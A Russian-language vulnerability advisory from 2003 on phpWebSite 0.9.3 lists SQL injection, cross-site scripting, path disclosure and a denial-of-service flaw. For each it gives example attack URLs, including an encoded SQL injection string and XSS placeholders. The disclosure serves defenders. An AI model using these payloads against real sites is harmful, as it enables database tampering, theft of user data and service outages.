Security Lab

Множественные уязвимости в phpWebSite

Дата публикации:13.08.2003
Всего просмотров:1180
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: phpWebSite 0.x
Описание: Несколько уязвимостей обнаружено в phpWebSite. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может вызвать отказ в обслуживании. Удаленный пользователь может выполнить XSS нападение.

1. SQL инъекция. Уязвимость обнаружена в модуле 'Calendar'. Пример:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20 startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1
выполнит запрос
 
2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <= 20071205)) and active=1
Уязвимы и другие сценарии в модуле 'Calendar'.

2. XSS. Уязвимость в проверке правильности входных данных обнаружена в модулях 'Calendar', 'PageMaster', и 'Fatcat'. Пример:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?modu le=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]

http://[HOST]/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
3. Раскрытие инсталляционного пути. Пример:
http://[target]/index.php?module=calendar&calendar[view]
=month&month=11&year=9
4. Переполнение буфера в модуле 'Calendar’, позволяет удаленному атакующему аварийно завершить работу Web сервера. Пример:
http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
[VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes ) 
 
Уязвимость обнаружена в phpWebSite 0.9.3
Ссылки: phpWebSite SQL Injection & DoS & XSS Vulnerabilities